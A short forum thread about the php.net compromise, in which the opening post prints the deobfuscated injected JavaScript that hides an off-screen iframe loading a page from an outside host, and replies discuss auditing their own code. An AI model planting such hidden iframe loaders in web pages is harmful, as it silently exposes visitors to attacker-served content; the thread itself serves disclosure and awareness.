Php.net has been hacked today. Roughly 5 hours ago it was flagged by all major browsers and google as malware. The attacker injected obfuscated javascript through a gateway into their userprefs.js file. You can read more here. The javascript roughly deobfuscates to:
[syntax=javascript]
tmp3 = (tmp2 = document.createElement('iframe')).style;
tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
tmp1 = (tmp0 = document.createElement('div')).style;
tmp1.width = tmp1.height = '-10000px';
tmp1.overflow = 'hidden';
tmp1.position = 'absolute';
tmp1.left = '-10000px';
tmp4 = document.getElementsByTagName('div');
tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);[/syntax]
Just like mysql.com (got SQL Injected not too long ago), if it can happen to them, it can happen to you.
php.net hacked
php.net hacked
<?php while(!$succeed = try()); ?>
Re: php.net hacked
I really hope this is somewhat contained and not a total breach.
Really makes you think about your own security though...
I am now compelled to go through the code for all my live projects for security flaws. I guess I know what I'll be doing for the rest of the day.
Really makes you think about your own security though...
I am now compelled to go through the code for all my live projects for security flaws. I guess I know what I'll be doing for the rest of the day.
Re: php.net hacked
Haha yes it does. I might just do the same later on. I believe they returned the file to its original contents. No word as of yet on the security breach being patched.
<?php while(!$succeed = try()); ?>